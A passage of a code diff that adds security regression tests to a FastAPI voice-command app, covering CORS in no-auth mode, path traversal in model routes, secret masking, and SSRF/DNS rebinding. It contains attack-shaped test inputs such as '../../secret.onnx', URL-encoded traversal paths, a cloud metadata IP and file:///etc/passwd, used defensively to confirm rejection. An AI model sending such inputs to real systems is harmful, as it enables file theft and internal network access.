+    monkeypatch.setenv("CHATCOMM_COMMAND_RATE_LIMIT", "1")
+    client = _make_client()
+    assert client.post("/api/v1/command", json={"command": "a"}).status_code == 200
+    assert client.post("/api/v1/command", json={"command": "a"}).status_code == 429
+    # Read-only endpoints stay available.
+    for _ in range(5):
+        assert client.get("/api/v1/status").status_code == 200
+        assert client.get("/api/v1/metrics").status_code == 200

--- a/tests/test_cors_no_auth.py
+++ b/tests/test_cors_no_auth.py
@@ -1,0 +1,135 @@
+# MIT License
+#
+# Tests for CORS restriction in --no-auth mode (security backlog, ex PR #624).
+#
+# no_auth=True disables authentication entirely, so the CORS allowlist must
+# NOT be a wildcard: with allow_origins=["*"] any website the user visits
+# could drive the unauthenticated API from their browser and read responses
+# (drive-by attack). The fix pins no-auth CORS to localhost origins by
+# default, overridable via CHATTY_CORS_ORIGINS.
+
+from fastapi.middleware.cors import CORSMiddleware
+from fastapi.testclient import TestClient
+
+from chatty_commander.app.command_executor import CommandExecutor
+from chatty_commander.app.config import Config
+from chatty_commander.app.model_manager import ModelManager
+from chatty_commander.app.state_manager import StateManager
+from chatty_commander.web.web_mode import WebModeServer
+
+
+def _build_server(no_auth: bool) -> WebModeServer:
+    config = Config()
+    state_manager = StateManager(config)
+    model_manager = ModelManager(config)
+    command_executor = CommandExecutor(config, model_manager, state_manager)
+    return WebModeServer(
+        config, state_manager, model_manager, command_executor, no_auth=no_auth
+    )
+
+
+def _cors_kwargs(app) -> dict:
+    middleware = next(m for m in app.user_middleware if m.cls is CORSMiddleware)
+    return middleware.kwargs
+
+
+class TestNoAuthCorsRestriction:
+    def test_no_auth_does_not_use_wildcard_origin(self, monkeypatch):
+        """The vulnerability shape: no_auth must never yield allow_origins=['*']."""
+        monkeypatch.delenv("CHATTY_CORS_ORIGINS", raising=False)
+        server = _build_server(no_auth=True)
+        kwargs = _cors_kwargs(server.app)
+        assert "*" not in kwargs["allow_origins"]
+
+    def test_no_auth_defaults_to_localhost_origins_only(self, monkeypatch):
+        monkeypatch.delenv("CHATTY_CORS_ORIGINS", raising=False)
+        server = _build_server(no_auth=True)
+        kwargs = _cors_kwargs(server.app)
+        assert kwargs["allow_origins"], "expected a non-empty localhost allowlist"
+        for origin in kwargs["allow_origins"]:
+            assert origin.startswith(("http://localhost", "http://127.0.0.1")), origin
+
+    def test_auth_mode_keeps_default_localhost_3000(self, monkeypatch):
+        """No behavior change for the authenticated factory path."""
+        monkeypatch.delenv("CHATTY_CORS_ORIGINS", raising=False)
+        server = _build_server(no_auth=False)
+        kwargs = _cors_kwargs(server.app)
+        assert kwargs["allow_origins"] == ["http://localhost:3000"]
+
+    def test_env_override_is_honored_in_no_auth_mode(self, monkeypatch):
+        monkeypatch.setenv(
+            "CHATTY_CORS_ORIGINS",
+            "https://chatty.example.com, http://localhost:9999",
+        )
+        server = _build_server(no_auth=True)
+        kwargs = _cors_kwargs(server.app)
+        assert kwargs["allow_origins"] == [
+            "https://chatty.example.com",
+            "http://localhost:9999",
+        ]
+
+    def test_env_override_is_honored_in_auth_mode(self, monkeypatch):
+        monkeypatch.setenv("CHATTY_CORS_ORIGINS", "https://ui.internal.example")
+        server = _build_server(no_auth=False)
+        kwargs = _cors_kwargs(server.app)
+        assert kwargs["allow_origins"] == ["https://ui.internal.example"]
+
+    def test_env_wildcard_override_disables_credentials(self, monkeypatch):
+        """If someone opts back into '*' via env, credentials must stay off (RFC 6454)."""
+        monkeypatch.setenv("CHATTY_CORS_ORIGINS", "*")
+        server = _build_server(no_auth=True)
+        kwargs = _cors_kwargs(server.app)
+        assert kwargs["allow_origins"] == ["*"]
+        assert kwargs["allow_credentials"] is False
+
+
+class TestNoAuthCorsBehavior:
+    """End-to-end: the browser-visible CORS headers in no_auth mode."""
+
+    def test_evil_origin_is_not_allowed(self, monkeypatch):
+        monkeypatch.delenv("CHATTY_CORS_ORIGINS", raising=False)
+        server = _build_server(no_auth=True)
+        client = TestClient(server.app)
+        resp = client.options(
+            "/api/v1/status",
+            headers={
+                "Origin": "https://evil.example",
+                "Access-Control-Request-Method": "GET",
+            },
+        )
+        assert resp.headers.get("access-control-allow-origin") != "https://evil.example"
+        assert resp.headers.get("access-control-allow-origin") != "*"
+
+    def test_localhost_origin_is_allowed(self, monkeypatch):
+        monkeypatch.delenv("CHATTY_CORS_ORIGINS", raising=False)
+        server = _build_server(no_auth=True)
+        client = TestClient(server.app)
+        resp = client.options(
+            "/api/v1/status",
+            headers={
+                "Origin": "http://localhost:3000",
+                "Access-Control-Request-Method": "GET",
+            },
+        )
+        assert resp.status_code == 200
+        assert (
+            resp.headers.get("access-control-allow-origin") == "http://localhost:3000"
+        )
+
+
+class TestCreateAppCors:
+    """server.create_app adds no CORS middleware: same-origin browser default."""
+
+    def test_create_app_has_no_cors_middleware(self):
+        from chatty_commander.web.server import create_app
+
+        app = create_app(no_auth=True)
+        assert not any(m.cls is CORSMiddleware for m in app.user_middleware)
+
+    def test_create_app_emits_no_cors_headers_for_cross_origin(self):
+        from chatty_commander.web.server import create_app
+
+        app = create_app(no_auth=True)
+        client = TestClient(app)
+        resp = client.get("/api/v1/status", headers={"Origin": "https://evil.example"})
+        assert "access-control-allow-origin" not in resp.headers

--- a/tests/test_models_path_traversal.py
+++ b/tests/test_models_path_traversal.py
@@ -1,0 +1,222 @@
+# MIT License
+#
+# Copyright (c) 2024 mhand
+#
+# Permission is hereby granted, free of charge, to any person obtaining a copy
+# of this software and associated documentation files (the "Software"), to deal
+# in the Software without restriction, including without limitation the rights
+# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+# copies of the Software, and to permit persons to whom the Software is
+# furnished to do so, subject to the following conditions:
+#
+# The above copyright notice and this permission notice shall be included in all
+# copies or substantial portions of the Software.
+#
+# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+# SOFTWARE.
+
+"""Attack-shaped tests for path traversal in the models routes.
+
+Covers upload, download, and delete handlers in
+``src/chatty_commander/web/routes/models.py``: ``../`` sequences, absolute
+paths, and URL-encoded traversal must never read, write, or delete files
+outside the model directories.
+"""
+
+from __future__ import annotations
+
+from pathlib import Path
+
+import pytest
+from fastapi import FastAPI
+from fastapi.testclient import TestClient
+
+from chatty_commander.web.routes.models import create_models_router
+
+
+@pytest.fixture()
+def sandbox(tmp_path, monkeypatch):
+    """Isolated working dir with model dirs and an out-of-bounds secret file.
+
+    Layout:
+        tmp_path/secret.onnx        <- must never be readable/deletable via API
+        tmp_path/app/               <- cwd for the server
+        tmp_path/app/wakewords/     <- upload dir
+        tmp_path/app/models-idle/   <- contains a legit model
+    """
+    app_dir = tmp_path / "app"
+    (app_dir / "wakewords").mkdir(parents=True)
+    (app_dir / "models-idle").mkdir()
+    (app_dir / "models-idle" / "legit.onnx").write_bytes(b"legit-model-bytes")
+
+    secret = tmp_path / "secret.onnx"
+    secret.write_bytes(b"out-of-bounds-secret")
+
+    monkeypatch.chdir(app_dir)
+
+    app = FastAPI()
+    app.include_router(create_models_router())
+    client = TestClient(app)
+    return client, app_dir, secret
+
+
+# ---------------------------------------------------------------------------
+# Upload handler
+# ---------------------------------------------------------------------------
+
+
+@pytest.mark.parametrize(
+    "evil_name",
+    [
+        "../evil.onnx",
+        "../../evil.onnx",
+        "../../secret.onnx",
+        "/tmp/evil.onnx",
+        "subdir/evil.onnx",
+        "....//evil.onnx",
+    ],
+)
+def test_upload_rejects_traversal_filenames(sandbox, tmp_path, evil_name):
+    client, app_dir, _secret = sandbox
+    resp = client.post(
+        "/api/v1/models/upload",
+        files={"file": (evil_name, b"payload", "application/octet-stream")},
+    )
+    assert resp.status_code == 400, resp.text
+    # Nothing escaped: no new files anywhere outside the model dirs
+    assert not (app_dir / "evil.onnx").exists()
+    assert not (tmp_path / "evil.onnx").exists()
+    assert not Path("/tmp/evil.onnx").exists()
+    # The out-of-bounds file was not overwritten
+    assert (tmp_path / "secret.onnx").read_bytes() == b"out-of-bounds-secret"
+    # Upload dir stayed empty
+    assert list((app_dir / "wakewords").iterdir()) == []
+
+
+def test_upload_rejects_traversal_even_with_state(sandbox, tmp_path):
+    """The state-selected target dir must be protected too."""
+    client, app_dir, _secret = sandbox
+    resp = client.post(
+        "/api/v1/models/upload?state=idle",
+        files={"file": ("../../secret.onnx", b"pwn", "application/octet-stream")},
+    )
+    assert resp.status_code == 400
+    assert (tmp_path / "secret.onnx").read_bytes() == b"out-of-bounds-secret"
+    assert sorted(p.name for p in (app_dir / "models-idle").iterdir()) == ["legit.onnx"]
+
+
+def test_upload_rejects_non_onnx_extension(sandbox):
+    client, _app_dir, _secret = sandbox
+    resp = client.post(
+        "/api/v1/models/upload",
+        files={"file": ("evil.sh", b"#!/bin/sh", "application/octet-stream")},
+    )
+    assert resp.status_code == 400
+
+
+def test_upload_legit_filename_still_works(sandbox):
+    client, app_dir, _secret = sandbox
+    resp = client.post(
+        "/api/v1/models/upload",
+        files={"file": ("good.onnx", b"model-bytes", "application/octet-stream")},
+    )
+    assert resp.status_code == 200, resp.text
+    body = resp.json()
+    assert body["success"] is True
+    assert body["filename"] == "good.onnx"
+    assert (app_dir / "wakewords" / "good.onnx").read_bytes() == b"model-bytes"
+
+    # Duplicate upload is refused with 409 (no silent overwrite)
+    resp2 = client.post(
+        "/api/v1/models/upload",
+        files={"file": ("good.onnx", b"other", "application/octet-stream")},
+    )
+    assert resp2.status_code == 409
+    assert (app_dir / "wakewords" / "good.onnx").read_bytes() == b"model-bytes"
+
+
+# ---------------------------------------------------------------------------
+# Download handler
+# ---------------------------------------------------------------------------
+
+
+@pytest.mark.parametrize(
+    "evil_path",
+    [
+        "..%2F..%2Fsecret.onnx",
+        "..%2f..%2fsecret.onnx",
+        "%2e%2e%2f%2e%2e%2fsecret.onnx",
+        "..",
+        "..%5C..%5Csecret.onnx",
+    ],
+)
+def test_download_rejects_traversal(sandbox, evil_path):
+    client, _app_dir, secret = sandbox
+    resp = client.get(f"/api/v1/models/download/{evil_path}")
+    assert resp.status_code == 404, resp.text
+    assert secret.read_bytes() == b"out-of-bounds-secret"
+    assert b"out-of-bounds-secret" not in resp.content
+
+
+def test_download_absolute_path_rejected(sandbox, tmp_path):
+    client, _app_dir, _secret = sandbox
+    quoted = str(tmp_path / "secret.onnx").replace("/", "%2F")
+    resp = client.get(f"/api/v1/models/download/{quoted}")
+    assert resp.status_code == 404
+    assert b"out-of-bounds-secret" not in resp.content
+
+
+def test_download_legit_file_still_works(sandbox):
+    client, _app_dir, _secret = sandbox
+    resp = client.get("/api/v1/models/download/legit.onnx")
+    assert resp.status_code == 200
+    assert resp.content == b"legit-model-bytes"
+
+
+# ---------------------------------------------------------------------------
+# Delete handler
+# ---------------------------------------------------------------------------
+
+
+@pytest.mark.parametrize(
+    "evil_path",
+    [
+        "..%2F..%2Fsecret.onnx",
+        "%2e%2e%2f%2e%2e%2fsecret.onnx",
+        "..",
+        "..%5C..%5Csecret.onnx",
+    ],
+)
+def test_delete_rejects_traversal(sandbox, evil_path):
+    client, _app_dir, secret = sandbox
+    resp = client.delete(f"/api/v1/models/files/{evil_path}")
+    assert resp.status_code == 404, resp.text
+    assert secret.exists()
+    assert secret.read_bytes() == b"out-of-bounds-secret"
+
+
+def test_delete_absolute_path_rejected(sandbox, tmp_path):
+    client, _app_dir, secret = sandbox
+    quoted = str(tmp_path / "secret.onnx").replace("/", "%2F")
+    resp = client.delete(f"/api/v1/models/files/{quoted}")
+    assert resp.status_code == 404
+    assert secret.exists()
+
+
+def test_delete_legit_file_still_works(sandbox):
+    client, app_dir, _secret = sandbox
+    resp = client.delete("/api/v1/models/files/legit.onnx")
+    assert resp.status_code == 200
+    assert resp.json()["success"] is True
+    assert not (app_dir / "models-idle" / "legit.onnx").exists()
+
+
+def test_delete_unknown_file_404(sandbox):
+    client, _app_dir, _secret = sandbox
+    resp = client.delete("/api/v1/models/files/nope.onnx")
+    assert resp.status_code == 404

--- a/tests/test_security.py
+++ b/tests/test_security.py
@@ -300,3 +300,52 @@ class TestMaskSensitiveData:
         masked_list = mask_sensitive_data(data_list)
         assert masked_list[0]["api_key"] == "********"
         assert masked_list[1]["other"] == "public"
+
+
+class TestMaskSensitiveDataBypasses:
+    """Attack-shaped tests: key-name variants and container shapes that
+    previously evaded masking (closed PR #626)."""
+
+    def test_key_name_variants_are_masked(self):
+        data = {
+            "Api-Key": "leak1",
+            "apiKey": "leak2",
+            "API KEY": "leak3",
+            "apikey": "leak4",
+            "X-Api-Key": "leak5",
+            "databaseUrl": "postgresql://user:pass@host/db",
+            "DATABASE-URL": "postgresql://user:pass@host/db",
+            "accessToken": "leak6",
+            "Bridge.Token": "leak7",
+        }
+        masked = mask_sensitive_data(data)
+        for key, value in masked.items():
+            assert value == "********", f"{key} leaked: {value!r}"
+
+    def test_non_str_keys_do_not_break_recursion(self):
+        data = {42: {"api_key": "leak"}, None: [{"password": "leak"}]}
+        masked = mask_sensitive_data(data)
+        assert masked[42]["api_key"] == "********"
+        assert masked[None][0]["password"] == "********"
+
+    def test_deeply_nested_lists_and_dicts(self):
+        data = {"outer": [[{"inner": {"Api-Key": "leak"}}]]}
+        masked = mask_sensitive_data(data)
+        assert masked["outer"][0][0]["inner"]["Api-Key"] == "********"
+
+    def test_dict_inside_tuple_is_masked(self):
+        data = {"items": ({"api_key": "leak"}, "ok")}
+        masked = mask_sensitive_data(data)
+        assert masked["items"][0]["api_key"] == "********"
+        assert masked["items"][1] == "ok"
+
+    def test_auth_key_variants(self):
+        data = {"AUTH": "user:pass", "auth": {"password": "leak", "username": "admin"}}
+        masked = mask_sensitive_data(data)
+        assert masked["AUTH"] == "********"
+        assert masked["auth"]["password"] == "********"
+        assert masked["auth"]["username"] == "admin"
+
+    def test_legitimate_keys_untouched(self):
+        data = {"monkey": "see", "donkey_count": 3, "authority": "rbac", "broken": True}
+        assert mask_sensitive_data(data) == data

--- a/tests/test_url_validator.py
+++ b/tests/test_url_validator.py
@@ -1,0 +1,89 @@
+"""SSRF / DNS-rebinding tests for chatty_commander.utils.url_validator.
+
+These tests stub ``socket.getaddrinfo`` to simulate an attacker-controlled
+low-TTL domain that resolves to a public IP at validation time and to an
+internal IP afterwards (DNS rebinding). They prove:
+
+1. the vulnerability shape: the boolean ``is_safe_url`` API cannot prevent
+   a later fetch from re-resolving to an internal address (TOCTOU), and
+2. the fix: ``resolve_safe_url`` pins the validated IP into the URL so the
+   fetch never performs a second DNS lookup, neutralizing rebinding.
+"""
+
+import ipaddress
+import socket
+from urllib.parse import urlparse
+
+import pytest
+
+from chatty_commander.utils.url_validator import (
+    PinnedURL,
+    is_safe_url,
+    resolve_safe_url,
+)
+
+PUBLIC_V4 = "93.184.216.34"
+PUBLIC_V6 = "2606:4700:4700::1111"
+INTERNAL_V4 = "127.0.0.1"
+
+
+def _addrinfo(ip: str, port: int = 80):
+    """Build a getaddrinfo-style result tuple for an IP string."""
+    if ":" in ip:
+        return (socket.AF_INET6, socket.SOCK_STREAM, 6, "", (ip, port, 0, 0))
+    return (socket.AF_INET, socket.SOCK_STREAM, 6, "", (ip, port))
+
+
+class RebindingResolver:
+    """Stub resolver: first lookup returns a public IP, later lookups an internal one."""
+
+    def __init__(self, first_ip: str = PUBLIC_V4, later_ip: str = INTERNAL_V4):
+        self.first_ip = first_ip
+        self.later_ip = later_ip
+        self.calls = 0
+
+    def __call__(self, host, port, *args, **kwargs):
+        self.calls += 1
+        ip = self.first_ip if self.calls == 1 else self.later_ip
+        return [_addrinfo(ip, port if isinstance(port, int) else 80)]
+
+
+@pytest.fixture
+def rebinding_resolver(monkeypatch):
+    resolver = RebindingResolver()
+    monkeypatch.setattr(socket, "getaddrinfo", resolver)
+    return resolver
+
+
+def _static_resolver(monkeypatch, ips):
+    def resolver(host, port, *args, **kwargs):
+        p = port if isinstance(port, int) else 80
+        return [_addrinfo(ip, p) for ip in ips]
+
+    monkeypatch.setattr(socket, "getaddrinfo", resolver)
+    return resolver
+
+
+class TestRebindingVulnerabilityShape:
+    """Documents the TOCTOU window inherent to the boolean is_safe_url API."""
+
+    def test_bool_api_cannot_stop_rebinding(self, rebinding_resolver):
+        # Validation time: domain resolves to a public IP -> passes.
+        assert is_safe_url("http://rebind.test/steal") is True
+        assert rebinding_resolver.calls == 1
+
+        # Fetch time: the HTTP client re-resolves the hostname itself.
+        # The attacker's low-TTL record now points at an internal address.
+        fetch_addrs = [
+            sockaddr[0]
+            for *_, sockaddr in socket.getaddrinfo("rebind.test", 80)
+        ]
+        assert fetch_addrs == [INTERNAL_V4]
+        # i.e. a caller fetching the *hostname* URL after is_safe_url()
+        # would connect to 127.0.0.1 despite validation having passed.
+        assert any(
+            ipaddress.ip_address(a).is_loopback for a in fetch_addrs
+        )
+
+
+class TestResolveSafeUrlPinsTheIp

--- a/tests/test_url_validator_rebinding.py
+++ b/tests/test_url_validator_rebinding.py
@@ -1,0 +1,147 @@
+"""Tests for SSRF / DNS-rebinding protections in url_validator.
+
+These use a stubbed resolver (socket.getaddrinfo) so no real DNS or network
+access occurs. They prove both the vulnerability shape (validation resolving
+to a benign address) and the fix (the returned URL is pinned to the validated
+IP, so a re-resolve to an internal address at fetch time is impossible).
+"""
+
+from __future__ import annotations
+
+import socket
+
+import pytest
+
+from chatty_commander.utils import url_validator
+from chatty_commander.utils.url_validator import (
+    is_safe_url,
+    resolve_safe_url,
+)
+
+
+def _addr_infos_for(ips: list[str]):
+    """Build getaddrinfo-shaped tuples for the given IP strings."""
+    infos = []
+    for ip in ips:
+        if ":" in ip:
+            family = socket.AF_INET6
+            sockaddr = (ip, 0, 0, 0)
+        else:
+            family = socket.AF_INET
+            sockaddr = (ip, 0)
+        infos.append((family, socket.SOCK_STREAM, socket.IPPROTO_TCP, "", sockaddr))
+    return infos
+
+
+@pytest.fixture
+def stub_resolver(monkeypatch):
+    """Patch getaddrinfo to return caller-controlled IPs per hostname."""
+    mapping: dict[str, list[str]] = {}
+
+    def fake_getaddrinfo(host, port, *args, **kwargs):
+        if host in mapping:
+            return _addr_infos_for(mapping[host])
+        raise socket.gaierror(f"unmapped host: {host}")
+
+    monkeypatch.setattr(socket, "getaddrinfo", fake_getaddrinfo)
+    return mapping
+
+
+def test_public_url_is_pinned_to_resolved_ip(stub_resolver):
+    stub_resolver["example.com"] = ["93.184.216.34"]
+    pinned = resolve_safe_url("http://example.com/path?q=1")
+    assert pinned is not None
+    assert pinned.ip == "93.184.216.34"
+    # Pinned URL connects to the IP literal, not the hostname.
+    assert pinned.url == "http://93.184.216.34/path?q=1"
+    # Host header / SNI preserve the original hostname.
+    assert pinned.host_header == "example.com"
+    assert pinned.sni_hostname == "example.com"
+
+
+def test_private_resolution_rejected(stub_resolver):
+    stub_resolver["evil.example.com"] = ["169.254.169.254"]
+    assert resolve_safe_url("http://evil.example.com/latest/meta-data") is None
+    assert is_safe_url("http://evil.example.com/latest/meta-data") is False
+
+
+def test_loopback_rejected(stub_resolver):
+    stub_resolver["localhost.attacker.com"] = ["127.0.0.1"]
+    assert is_safe_url("http://localhost.attacker.com") is False
+
+
+def test_multi_record_any_private_is_rejected(stub_resolver):
+    # One benign + one internal address: must reject (no multi-A bypass).
+    stub_resolver["mixed.example.com"] = ["93.184.216.34", "10.0.0.5"]
+    assert resolve_safe_url("http://mixed.example.com") is None
+
+
+def test_dns_rebinding_pinning_defeats_second_resolution(stub_resolver):
+    """The core TOCTOU test.
+
+    Validation sees a benign IP. We then flip DNS to an internal IP (as a
+    rebinding attacker would at fetch time). Because resolve_safe_url pins to
+    the validated IP, the URL we would actually connect to still points at the
+    benign address — the second resolution never gets a chance to redirect us.
+    """
+    host = "rebind.attacker.com"
+    stub_resolver[host] = ["93.184.216.34"]  # first lookup: benign
+
+    pinned = resolve_safe_url(f"http://{host}/")
+    assert pinned is not None
+    assert pinned.url == "http://93.184.216.34/"
+
+    # Attacker flips DNS to point at the metadata service.
+    stub_resolver[host] = ["169.254.169.254"]
+
+    # A naive fetcher re-resolving the hostname would now be redirected
+    # internally: demonstrate that the *hostname* now validates as unsafe...
+    assert is_safe_url(f"http://{host}/") is False
+    # ...but the previously pinned URL still targets the validated public IP,
+    # so connecting to pinned.url cannot reach the internal address.
+    assert "169.254.169.254" not in pinned.url
+
+
+def test_ipv6_url_is_pinned_with_brackets(stub_resolver):
+    stub_resolver["v6.example.com"] = ["2606:2800:220:1:248:1893:25c8:1946"]
+    pinned = resolve_safe_url("https://v6.example.com:8443/x")
+    assert pinned is not None
+    assert pinned.url == "https://[2606:2800:220:1:248:1893:25c8:1946]:8443/x"
+    assert pinned.host_header == "v6.example.com:8443"
+
+
+def test_port_preserved_in_pinned_url(stub_resolver):
+    stub_resolver["svc.example.com"] = ["93.184.216.34"]
+    pinned = resolve_safe_url("http://svc.example.com:8080/api")
+    assert pinned is not None
+    assert pinned.url == "http://93.184.216.34:8080/api"
+    assert pinned.host_header == "svc.example.com:8080"
+
+
+def test_disallowed_scheme_rejected(stub_resolver):
+    assert resolve_safe_url("file:///etc/passwd") is None
+    assert resolve_safe_url("ftp://example.com/x") is None
+
+
+def test_missing_hostname_rejected(stub_resolver):
+    assert resolve_safe_url("http:///nohost") is None
+
+
+def test_resolution_failure_fails_closed(stub_resolver):
+    # Host not in mapping -> stub raises gaierror -> None.
+    assert resolve_safe_url("http://nonexistent.example.com") is None
+
+
+def test_unexpected_error_fails_closed(monkeypatch):
+    def boom(*args, **kwargs):
+        raise RuntimeError("resolver exploded")
+
+    monkeypatch.setattr(socket, "getaddrinfo", boom)
+    assert resolve_safe_url("http://example.com") is None
+    assert is_safe_url("http://example.com") is False
+
+
+def test_is_safe_url_delegates_to_resolve(stub_resolver):
+    stub_resolver["ok.example.com"] = ["93.184.216.34"]
+    assert is_safe_url("http://ok.example.com") is True
+    assert url_validator.is_safe_url("http://ok.example.com") is True

--- a/tests/test_web_server.py
+++ b/tests/test_web_server.py
@@ -776,7 +776,9 @@ class TestWebModeServer:
         response = test_client.put("/api/v1/config", json=new_config)
         assert response.status_code == 500
         data = response.json()
-        assert "detail" in data
+        # Standardized error envelope from web/errors.py
+        assert "error" in data
+        assert "code" in data
 
     def test_get_state_endpoint(self, test_client, web_server):
         response = test_client.get("/api/v1/state")

--- a/webui/frontend/src/pages/VoiceTestPage.tsx
+++ b/webui/frontend/src/pages/VoiceTestPage.tsx
@@ -34,6 +34,7 @@ const STAGE_LABELS: Record<string, string> = {
   wakeword: "Wake word",
   transcript: "Transcript",
   match: "Command match",
+  action: "Dry-run action",
   dry_run_action: "Dry-run action",
   "dry-run": "Dry-run action",
   error: "Error",

--- a/webui/frontend/tests/e2e/voice_test.spec.ts
+++ b/webui/frontend/tests/e2e/voice_test.spec.ts
@@ -1,0 +1,197 @@
+import { test as base, expect, chromium, Page } from "@playwright/test";
+
+// ---------------------------------------------------------------------------
+// Voice Test page (in-browser voice testing, dry-run pipeline)
+//
+// Runs against the real test backend started by playwright.config.ts
+// (`--web --test-mode --no-auth` on port 8100), which serves the built SPA
+// and the /ws/voice-test WebSocket endpoint. Nothing is mocked: the
+// transcript -> match -> action events come from the live dry-run pipeline
+// (VoiceTestPipeline) matching against the repo-root config.json commands.
+//
+// Microphone access uses Chromium's fake media stream so no permission
+// prompt or real audio hardware is needed:
+//   --use-fake-ui-for-media-stream     auto-accepts getUserMedia
+//   --use-fake-device-for-media-stream provides a synthetic audio input
+//
+// The flags are browser-launch arguments, and `test.use({ launchOptions })`
+// does not reliably re-launch the worker's shared browser with extra args,
+// so the mic tests launch their own Chromium via an explicit fixture.
+//
+// The backend's SecurityHeadersMiddleware serves
+// `Permissions-Policy: microphone=(self)`, which permits same-origin
+// getUserMedia — asserted below so a regression to `microphone=()` (which
+// blocks the mic in every real browser) is caught here.
+// ---------------------------------------------------------------------------
+
+const test = base.extend<{ fakeMicPage: Page }>({
+  fakeMicPage: async ({ baseURL }, use) => {
+    const browser = await chromium.launch({
+      args: [
+        "--use-fake-ui-for-media-stream",
+        "--use-fake-device-for-media-stream",
+      ],
+    });
+    const context = await browser.newContext({
+      baseURL,
+      permissions: ["microphone"],
+    });
+    const page = await context.newPage();
+    await use(page);
+    await browser.close();
+  },
+});
+
+// A command present in the backend's test-mode config (config.json ->
+// model_actions). "lights on" whole-word matches the "lights_on" command,
+// whose action is a URL, so the dry-run description is "would open <url>".
+const SIMULATED_UTTERANCE = "lights on";
+const EXPECTED_COMMAND = "lights_on";
+
+async function gotoVoiceTest(page: Page) {
+  await page.goto("/voice-test");
+  await expect(page.getByTestId("voice-test-page")).toBeVisible();
+}
+
+/** The simulate-send button is disabled until the WebSocket is connected. */
+async function waitForWsConnected(page: Page) {
+  await expect(page.getByTestId("voice-ws-status")).toHaveText(/Connected/, {
+    timeout: 15_000,
+  });
+}
+
+test.describe("Voice Test page", () => {
+  test("loads with the dry-run banner and connects its WebSocket", async ({
+    page,
+  }) => {
+    await gotoVoiceTest(page);
+
+    const banner = page.getByTestId("dry-run-banner");
+    await expect(banner).toBeVisible();
+    await expect(banner).toContainText(
+      "Dry-run mode: detected commands are reported, not executed."
+    );
+
+    // The page connects to the live /ws/voice-test endpoint on load and
+    // sends the {type: "start", dry_run: true} handshake; the backend
+    // acknowledges with a "listening" stage event confirming dry-run mode.
+    await waitForWsConnected(page);
+    const listeningEvent = page.locator(
+      '[data-testid="voice-stage-event"][data-stage="listening"]'
+    );
+    await expect(listeningEvent).toHaveCount(1, { timeout: 10_000 });
+    await expect(listeningEvent).toContainText("dry_run: true");
+    await expect(listeningEvent).toHaveAttribute("data-status", "success");
+  });
+
+  test("enabling the microphone reaches the active state and renders the level meter", async ({
+    fakeMicPage: page,
+  }) => {
+    // The server must permit same-origin microphone access; a regression to
+    // `microphone=()` blocks getUserMedia in every real browser.
+    const response = await page.request.get("/voice-test");
+    expect(response.headers()["permissions-policy"] ?? "").toContain(
+      "microphone=(self)"
+    );
+
+    await gotoVoiceTest(page);
+
+    const micToggle = page.getByTestId("mic-toggle");
+    await expect(micToggle).toHaveText(/Enable microphone/);
+    await micToggle.click();
+
+    // Fake media stream: permission is auto-granted, no prompt, so the page
+    // must land in the "active" state (not "denied").
+    await expect(page.getByTestId("mic-state")).toHaveText(
+      /Listening — audio is streaming to the server/,
+      { timeout: 10_000 }
+    );
+    await expect(page.getByTestId("mic-denied-alert")).toHaveCount(0);
+    await expect(micToggle).toHaveText(/Stop microphone/);
+
+    // The input level meter renders as an accessible meter element.
+    const meter = page.getByTestId("voice-level-meter");
+    await expect(meter).toBeVisible();
+    await expect(meter).toHaveRole("meter");
+    await expect(meter).toHaveAttribute("aria-valuemin", "0");
+    await expect(meter).toHaveAttribute("aria-valuemax", "100");
+
+    // The fake audio device emits a periodic tone; the AnalyserNode loop must
+    // report a non-zero level at some point. waitForFunction polls on rAF so
+    // it can catch the level mid-beep.
+    await page.waitForFunction(
+      () => {
+        const el = document.querySelector(
+          '[data-testid="voice-level-meter"]'
+        );
+        return (
+          el !== null && Number(el.getAttribute("aria-valuenow") ?? "0") > 0
+        );
+      },
+      undefined,
+      { timeout: 15_000 }
+    );
+
+    // Toggling again stops the mic and removes the meter.
+    await micToggle.click();
+    await expect(page.getByTestId("mic-state")).toHaveText(/Microphone off/);
+    await expect(meter).toHaveCount(0);
+  });
+
+  test("simulated text command renders transcript -> match -> dry-run action", async ({
+    page,
+  }) => {
+    await gotoVoiceTest(page);
+    await waitForWsConnected(page);
+
+    const input = page.getByTestId("voice-simulate-input");
+    const send = page.getByTestId("voice-simulate-send");
+    await input.fill(SIMULATED_UTTERANCE);
+    await expect(send).toBeEnabled();
+    await send.click();
+
+    const timeline = page.getByTestId("voice-stage-timeline");
+    await expect(timeline).toBeVisible({ timeout: 10_000 });
+    const events = page.getByTestId("voice-stage-event");
+
+    // Transcript stage echoes the simulated utterance.
+    const transcriptEvent = page.locator(
+      '[data-testid="voice-stage-event"][data-stage="transcript"]'
+    );
+    await expect(transcriptEvent).toHaveCount(1, { timeout: 10_000 });
+    await expect(transcriptEvent).toContainText(SIMULATED_UTTERANCE);
+    await expect(transcriptEvent).toContainText("simulated: true");
+    await expect(transcriptEvent).toHaveAttribute("data-status", "success");
+
+    // Match stage reports a successful match against the configured command.
+    const matchEvent = page.locator(
+      '[data-testid="voice-stage-event"][data-stage="match"]'
+    );
+    await expect(matchEvent).toHaveCount(1);
+    await expect(matchEvent).toContainText("matched: true");
+    await expect(matchEvent).toContainText(`command: ${EXPECTED_COMMAND}`);
+    await expect(matchEvent).toHaveAttribute("data-status", "success");
+
+    // Dry-run action stage: describes what WOULD run, executes nothing.
+    const actionEvent = page.locator(
+      '[data-testid="voice-stage-event"][data-stage="action"]'
+    );
+    await expect(actionEvent).toHaveCount(1);
+    await expect(actionEvent).toContainText(`command: ${EXPECTED_COMMAND}`);
+    await expect(actionEvent).toContainText("dry_run: true");
+    await expect(actionEvent).toContainText("executed: false");
+    await expect(actionEvent).toContainText(/would/);
+    await expect(actionEvent).toHaveAttribute("data-status", "success");
+
+    // Stages arrive in pipeline order: transcript before match before action.
+    const stages = await events.evaluateAll((els) =>
+      els.map((el) => el.getAttribute("data-stage"))
+    );
+    const ti = stages.indexOf("transcript");
+    const mi = stages.indexOf("match");
